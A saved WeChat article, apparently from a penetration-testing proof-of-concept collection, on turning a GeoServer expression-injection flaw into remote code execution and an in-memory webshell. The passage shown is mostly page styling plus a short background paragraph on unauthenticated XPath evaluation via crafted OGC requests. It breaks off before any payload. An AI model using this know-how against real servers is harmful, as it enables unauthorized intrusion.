Penetration_Testing_POC/books/GeoServer property RCE注入内存马.html

<!DOCTYPE html> <html class style><!--
 Page saved with SingleFile 
 url: https://mp.weixin.qq.com/s/beRJ8-HOMJbA43jYMMS0Pg 
--><meta charset=utf-8><style>body{transition:opacity ease-in .2s}</style>
<meta name=wechat-enable-text-zoom-em content=true>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=color-scheme content="light dark">
<meta name=viewport content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
<meta name=apple-mobile-web-app-capable content=yes>
<meta name=apple-mobile-web-app-status-bar-style content=black>
<meta name=format-detection content="telephone=no">
<meta name=description content=表达式注入的武器化利用>
<meta name=author content=yzddMr6>
<meta property=og:title content="GeoServer property RCE注入内存马">
<meta property=og:url content="http://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&amp;mid=2247484076&amp;idx=1&amp;sn=4064cb6a006f5cc454b7fb982e8ab9c6&amp;chksm=ce130559f9648c4fd7a60bc35aa5e3d5402b9ac5fbd154c8ed90695c40055dbe83ff9ee5ea38#rd">
<meta property=og:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
<meta property=og:description content=表达式注入的武器化利用>
<meta property=og:site_name content="Weixin Official Accounts Platform">
<meta property=og:type content=article>
<meta property=og:article:author content=yzddMr6>
<meta property=twitter:card content=summary>
<meta property=twitter:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
<meta property=twitter:title content="GeoServer property RCE注入内存马">
<meta property=twitter:creator content=yzddMr6>
<meta property=twitter:site content="Weixin Official Accounts Platform">
<meta property=twitter:description content=表达式注入的武器化利用>
<title>GeoServer property RCE注入内存马</title>
<style>@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.93);--weui-MATERIAL-NAVIGATIONBAR:rgba(18,18,18,.9);--weui-MATERIAL-REGULAR:rgba(37,37,37,.6);--weui-MATERIAL-THICK:rgba(34,34,34,.9);--weui-MATERIAL-THIN:rgba(95,95,95,.4);--weui-MATERIAL-TOOLBAR:rgba(35,35,35,.93);--weui-ORANGE-100:#c87d2f;--weui-ORANGE-120:#a06425;--weui-ORANGE-170:#3b250e;--weui-ORANGE-80:#d39758;--weui-ORANGE-90:#cd8943;--weui-ORANGE-BG-100:#bb6000;--weui-ORANGE-BG-110:#a85600;--weui-ORANGE-BG-130:#824300;--weui-ORANGE-BG-90:#c1701a;--weui-ORANGERED-100:#ff6146;--weui-OVERLAY:rgba(0,0,0,.8);--weui-OVERLAY-WHITE:rgba(242,242,242,.8);--weui-PURPLE-100:#8183ff;--weui-PURPLE-120:#6768cc;--weui-PURPLE-170:#26274c;--weui-PURPLE-80:#9a9bff;--weui-PURPLE-90:#8d8fff;--weui-PURPLE-BG-100:#6768cc;--weui-PURPLE-BG-110:#5c5db7;--weui-PURPLE-BG-130:#48498f;--weui-PURPLE-BG-90:#7677d1;--weui-RED-100:#fa5151;--weui-RED-120:#c84040;--weui-RED-170:#4b1818;--weui-RED-80:#fb7373;--weui-RED-90:#fa6262;--weui-RED-BG-100:#cf5148;--weui-RED-BG-110:#ba4940;--weui-RED-BG-130:#913832;--weui-RED-BG-90:#d3625a;--weui-SECONDARY-BG:rgba(255,255,255,.1);--weui-SEPARATOR-0:rgba(255,255,255,.05);--weui-SEPARATOR-1:rgba(255,255,255,.15);--weui-STATELAYER-HOVERED:rgba(0,0,0,.02);--weui-STATELAYER-PRESSED:rgba(255,255,255,.1);--weui-STATELAYER-PRESSEDSTRENGTHENED:rgba(255,255,255,.2);--weui-YELLOW-100:#cc9c00;--weui-YELLOW-120:#a37c00;--weui-YELLOW-170:#3d2f00;--weui-YELLOW-80:#d6af33;--weui-YELLOW-90:#d1a519;--weui-YELLOW-BG-100:#bf9100;--weui-YELLOW-BG-110:#ab8200;--weui-YELLOW-BG-130:#866500;--weui-YELLOW-BG-90:#c59c1a;--weui-FG-HALF:rgba(255,255,255,.6);--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-TEXTGREEN:#259c5c;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-REDORANGE:#ff6146;--weui-TAG-TEXT-BLACK:rgba(255,255,255,.5);--weui-TAG-BACKGROUND-BLACK:rgba(255,255,255,.05);--weui
<style>@-webkit-keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@-webkit-keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@-webkit-keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@-webkit-keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@-webkit-keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@-webkit-keyframes txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@media(max-width:1269px){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-wa-hotarea_before:before,.weui-wa-hotarea:after{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}body .weui-wa-hotarea_before:before,body .weui-wa-hotarea:after{pointer-events:auto}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-flex{display:-ms-flexbox}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link:visited{color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;-ms-user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default:not(.weui-btn_disabled):visited{color:var(--weui-FG-0)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiAudioPlaying{30%{-webkit-mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\ 4.251\ 0\ 0\ 0\ 1.23-3\ 4.25\ 4.25\ 0\ 0\ 0-1.23-3L5\ 12l2.97\ 3z\'/%3E%3C/svg%3E);mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\ 
<style>@media(prefers-color-scheme:dark){}@media screen and (min-width:717px){}</style>
<style>@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-half-screen-dialog{display:-ms-flexbox;-ms-flex-direction:column}@media only screen and (max-device-height:558px){}.weui-half-screen-dialog__bd{-ms-flex:1;-webkit-hyphens:auto;-ms-hyphens:auto}.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2)+.weui-btn{display:inline-block;vertical-align:top;margin:0 8px;width:120px}@media(prefers-color-scheme:dark){}.weui-half-screen-dialog__btn-area{display:-ms-flexbox;-ms-flex-align:center;-ms-flex-pack:center}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn{margin:0 8px;width:136px}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):first-child,.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn:first-child{margin-left:0}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):last-child,.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn:last-child{margin-right:0}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-5:#2c2c2c;--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-REDORANGE:#ff6146;--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.
<style>:root{--articleFontsize:17px}h1{font-weight:400}a{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-drag:none}html{-webkit-text-size-adjust:100%;-webkit-touch-callout:none}body{letter-spacing:.034em;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}body.wx_wap_page{font-family:system-ui,-apple-system,BlinkMacSystemFont,Helvetica Neue,PingFang SC,Hiragino Sans GB,Microsoft YaHei UI,Microsoft YaHei,Arial,sans-serif}.rich_media_content{font-size:var(--articleFontsize);overflow:hidden;text-align:justify}.rich_media_content *{max-width:100% !important;box-sizing:border-box !important;-webkit-box-sizing:border-box !important;word-wrap:break-word !important}.rich_media_content p{clear:both;min-height:1em}body{text-underline-position:under;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none;text-underline-offset:.1em}@supports(-webkit-overflow-scrolling:touch){body{text-underline-position:from-font}}.wxw-img{vertical-align:bottom}.autoTypeSetting24psection>p{margin-top:0;margin-bottom:24px}a{color:var(--weui-LINK)}.rich_media_content{color:var(--weui-FG-HALF)}@media(prefers-color-scheme:dark){}body{color:var(--weui-FG-0)}body.mm_appmsg{box-sizing:border-box;padding-bottom:calc(env(safe-area-inset-bottom) + var(--appmsgPageBottomGap))}body.mm_appmsg .rich_media_extra_discuss{padding-bottom:0}body.mm_appmsg .rich_media_extra_discuss:not(.rich_media_extra_discuss_empty){background-color:var(--weui-BG-2)}body.mm_appmsg.wx_wap_page_primary{background-color:var(--weui-BG-2)}.appmsg_skin_default .rich_media_area_primary{background:var(--weui-BG-2)}.rich_media_area_primary{padding:calc(20px + env(safe-area-inset-top)) calc(var(--appmsgPageGap) + env(safe-area-inset-right))0 calc(var(--appmsgPageGap) + env(safe-area-inset-left))}.rich_media_title{font-size:22px;line-height:1.4;margin-bottom:14px}@supports(-webkit-overflow-scrolling:touch){.rich_media_title{font-weight:700}}.rich_media_meta_list{margin-bottom:22px;line-height:20px;font-size:0;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}.rich_media_meta_list em{font-style:normal}.rich_media_meta_list .weui-wa-hotarea:after{min-height:100%;min-width:100%;padding:5px 4px}.rich_media_meta{display:inline-block;vertical-align:middle;margin:0 10px 10px 0;font-size:15px;-webkit-tap-highlight-color:rgba(0,0,0,0)}.rich_media_meta.appmsg_title_tag{margin-right:8px;overflow:visible}.rich_media_meta_text{color:var(--weui-FG-2)}.rich_media_meta_nickname{position:relative}.rich_media_content{z-index:0}.wx_wap_desktop_fontsize_2 .album_read_card,.wx_wap_desktop_fontsize_2 .rich_media_extra,.wx_wap_desktop_fontsize_2 .rich_media_tool__wrp,.wx_wap_desktop_fontsize_2 .rich_media_wrp{zoom:1}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.wx-root,body{--APPMSGCARD-BG:#fafafa}.wx-root[data-weui-theme=dark]{--APPMSGCARD-BG:#1e1e1e}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-BG:#1e1e1e}}.wx-root,body{--APPMSGCARD-LINE-BG:rgba(0,0,0,.07)}.wx-root[data-weui-theme=dark]{--APPMSGCARD-LINE-BG:rgba(255,255,255,.07)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-LINE-BG:rgba
<style>/*!
 * WeUI v2.6.4 (https://github.com/weui/weui)
 * Copyright 2023 Tencent, Inc.
 * Licensed under the MIT license
 */@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:hsla(0,0%,100%,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:hsla(0,0%,100%,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:hsla(0,0%,100%,.1)}}html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{line-height:1.6}*{margin:0;padding:0;outline:0}a{text-decoration:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}::-webkit-input-placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}::placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-FG-0:hsla(0,0%,100%,.8);--weui-FG-HALF:hsla(0,0%,100%,.6);--weui-FG-1:hsla(0,0%,100%,.5);--weui-FG-2:hsla(0,0%,100%,.3);--weui-FG-3:hsla(0,0%,100%,.1);--weui-FG-4:hsla(0,0%,100%,.15);--weui-FG-5:hsla(0,0%,100%,.1);--weui-RED:#fa5151;--weui-REDORANGE:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-WHITE:hsla(0,0%,100%,.8);--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-FG:#fff;--weui-BG:#000;--weui-TAG-TEXT-RED:rgba(250,81,81,.6);--weui-TAG-BACKGROUND-RED:rgba(250,81,81,.1);--weui-TAG-TEXT-ORANGE:rgba(250,157,59,.6);--weui-TAG-BACKGROUND-ORANGE:rgba(250,157,59,.1);--weui-TAG-TEXT-GREEN:rgba(6,174,86,.6);--weui-TAG-BACKGROUND-GREEN:rgba(6,174,86,.1);--weui-TAG-TEXT-BLUE:rgba(16,174,255,.6);--weui-TAG-BACKGROUND-BLUE:rgba(16,174,255,.1);--weui-TAG-TEXT-BLACK:hsla(0,0%,100%,.5);--weui-TAG-BACKGROUND-BLACK:hsla(0,0%,100%,.05)}}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-wa-hotarea{position:relative}.weui-wa-hotarea:after,.weui-wa-hotarea_before:before{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link,.weui-link:visited{color:#576b95;color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{position:relative;display:block;margin-left:auto;margin-right:auto;padding:12px 24px;box-sizing:border-box;font-weight:500;font-size:17px;text-align:center;text-decoration:none;color:#fff;line-height:1.41176471;border-radius:8px;-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:rgba(0,0,0,.1);background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default{background-color:var(--weui-FG-5)}.weui-btn_default,.weui-btn_default:not(.weui-btn_disabled):visited{color:rgba(0,0,0,.9);color:var(--weui-FG-0)}.weui-btn_primary{background-color:var(--weui-BRAND)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.weui-btn+.weui-btn{margin-top:16px}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}body{--weui-STEPS-DEFAULT-COLOR:var(--weui-FG-3);--weui-STEPS-HIGHLIGHT-COLOR:var(--weui-BRAND);--weui-STEPS-FONT-SIZE:17;--weui-STEPS-LINEHEIGHT:1.4;--weui-STEPS-DOT-SIZE:calc(8/var(--weui-STEPS-FONT-SIZE)*1em);--weui-STEPS-ICON-SIZE:40;--weui-STEPS-VERTICAL-DOT-GAP:calc((1em - var(--weui-STEPS-DOT-SIZE))/2);--weui-STEPS-HORIZONAL-DOT-GAP:4px}body{--weui-cellMarginLR:16px;--weui-cellPaddingLR:16px}@media(prefers-color-scheme:dark){}.weui-flex{display:-webkit-box;display:-webkit-flex}@media screen and (min-width:352px){}.weui-half-screen-dialog{dis
 <body id=activity-detail class="zh_CN wx_wap_page wx_wap_desktop_fontsize_2 mm_appmsg comment_feature discuss_tab appmsg_skin_default appmsg_style_default pages_skin_pc wx_wap_page_primary not_in_mm">
 
 
 
<div id=js_article style=position:relative class=rich_media>
 
 <div id=js_top_ad_area class=top_banner></div>
 
 <div id=js_base_container class=rich_media_inner>
 
 
 
<div class="wx_row_immersive_stream_wrap sf-hidden" id=js_row_immersive_stream_wrap>
 
 
 
</div>
 
 <div id=page-content class=rich_media_area_primary>
 <div class=rich_media_area_primary_inner>
 
 
 
 
 
 <div id=img-content class=rich_media_wrp>
 
 <h1 class=rich_media_title id=activity-name>
 
GeoServer property RCE注入内存马
 </h1>
 <div id=meta_content class=rich_media_meta_list>
 <span id=copyright_logo class="wx_tap_link js_wx_tap_highlight rich_media_meta icon_appmsg_tag appmsg_title_tag weui-wa-hotarea">Original</span>
 <span class="rich_media_meta rich_media_meta_text">
 <span role=link tabindex=0 id=js_author_name class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" datarewardsn datatimestamp datacanreward=0>yzddMr6</span>
 </span>
 
 <span class="rich_media_meta rich_media_meta_nickname" id=profileBt>
 <a href=javascript:void(0) class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" id=js_name>
 网络安全回收站 </a>
 <div id=js_profile_qrcode aria-hidden=true class=profile_container style=display:none>
 
 
 </div>
 
 
 </span>
 <span id=meta_content_hide_info>
 <em id=publish_time class="rich_media_meta rich_media_meta_text">2024-07-04 21:07</em>
 <em id=js_ip_wording_wrp class="rich_media_meta rich_media_meta_text" role=option aria-labelledby="js_a11y_op_ip_wording js_ip_wording" style=display:inline-block><span id=js_a11y_op_ip_wording aria-hidden=true></span><span aria-hidden=true id=js_ip_wording>浙江</span></em>
 </span>
 </div>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 <div class="rich_media_content js_underline_content autoTypeSetting24psection" id=js_content><h2 style='margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>背景</h2><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。from 